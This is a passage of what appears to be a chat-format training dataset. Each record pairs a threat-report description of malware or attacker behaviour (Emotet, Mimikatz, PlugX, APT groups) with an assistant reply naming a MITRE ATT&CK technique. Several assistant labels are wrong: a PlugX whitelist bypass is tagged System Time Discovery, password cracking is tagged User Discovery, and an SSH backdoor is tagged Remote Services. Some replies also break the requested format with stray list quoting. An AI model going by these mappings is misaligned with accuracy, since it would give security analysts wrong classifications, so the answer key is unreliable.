- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT establishes Persistence by setting the \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" Registry key to point to its executable."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 has disguised its scheduled tasks as those used by Google."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz creates a new server and nTDSDSA objects in the Active Directory forest Configuration partition. Next, it updates the SPN (Service Principal Name) of the computer hosting the rogue domain controller to “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (Active Directory Replication). The rogue domain controller is now registered and capable of replicating data to other domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to log keystrokes from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon has modified a victim's Windows Run registry to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BONDUPDATER can download or upload files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can collect information about domain users, including identification of domain admin accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The monitoring loop will retrieve the address of WTSEnumerateSessionsW and the local mac address using GetAdaptersInfo"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic"
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility', 'T1074.001 - Data Staged: Local Data Staging', 'T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the system time and will only activate if it is greater than a preset date."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth spawns a CMD process to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords"
- },
- {
- "role": "assistant",
- "content": "T1556.001 - Domain Controller Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "down_new has the ability to base64 encode C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki has used the dogechain.info API to generate a C2 address."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects its DLL file into a newly spawned Internet Explorer process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has used \"Nt*\" Native API functions to inject code into legitimate processes such as \"wermgr.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can enumerate the IP address of a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~/Library/Application\\ Support/MobileSync/Backup/\"."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1120 - Peripheral Device Discovery', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 4 – Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered"
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot has obfuscated scripts used in execution."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has tricked unwitting recipients into clicking on spearphishing attachments and enabling malicious macros embedded within files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors discovered network disks mounted to the system using netstat."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An Port 22 malware variant registers itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can listen in to victims' conversations through the system’s microphone."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While Emotet has been around for many years and is one of the most well-known pieces of malware in the wild, that doesn't mean attackers don't try to freshen it up. These new campaigns have been observed following a period of relatively low Emotet distribution activity, corresponding with the observance of Orthodox Christmas in certain geographic regions. These new malicious efforts involve sending victims malicious Microsoft Word attachments with embedded macros that download Emotet. This latest strain has also gained the ability to check if the infected IP where the malicious email is being sent from is already blocklisted on a spam list"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses."
- },
- {
- "role": "assistant",
- "content": "T1216.001 - Signed Script Proxy Execution: Pubprn"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can capture a screenshot of the current screen."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 has registered hundreds of domains for use in operations."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can make modifications to Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS)."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application whitelist bypass file: SHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2: This time the attacker didn’t have to write any of their own code, instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The link provided in the malicious email led to a fake VPN Web Portal: Upon logging in with the credentials provided in the email, the victim is presented with the following page: The victim is asked to install the “VPN Client” (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside)"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used the Windows API to execute code within a victim's system."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "nbtstat can be used to discover local NetBIOS domain names."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Enabling the macros starts a multi-stage infection chain that eventually downloads and executes a Cobalt Strike beacon, providing the attackers with a foothold inside the target organization."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can identify the geographical location of a victim host."
- },
- {
- "role": "assistant",
- "content": "T1614 - System Location Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It’s also used to inject code into its target processes using the technique."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can use winapiexec tool for indirect execution of \"ShellExecuteW\" and \"CreateProcessA\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type network traffic can communicate over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used NTDSDump and other password dumping tools to gather credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE uses the command prompt to execute commands on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects network adapter and interface information by using the commands ipconfig /all, arp -a and route print. It also collects the system's MAC address with getmac and domain configuration with net config workstation."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the February 2018 attacks"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Microsoft has been monitoring these attacks and notifying targeted customers for several months, but only recently reached a point in our investigation where we can attribute the activity to Strontium with high confidence. MSTIC’s investigation revealed that Strontium has evolved its tactics since the 2016 election to include new reconnaissance tools and new techniques to obfuscate their operations. In recent months, it has engaged in brute force attacks and password spray, two tactics that have likely allowed them to automate aspects of their operations. Strontium also disguised these credential harvesting attacks in new ways, running them through more than 1,000 constantly rotating IP addresses, many associated with the Tor anonymizing service. Strontium even evolved its infrastructure over time, adding and removing about 20 IPs per day to further mask its activity"
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can use \"netstat\" and \"nbtstat\" to detect active network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used a modified and obfuscated version of the reGeorg web shell to maintain persistent access on a target's Outlook Web Access (OWA® ) server."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. This technique takes advantage of the fact that Windows does not require an application to provide a specific path for a DLL that it wishes to load. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor’s component may be run with elevated privileges"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Modifying the Standard Information timestamps (created, modified, accessed) of every downloaded executable to match a randomly selected file from the System32 directory that was created prior to 2013"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns"
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
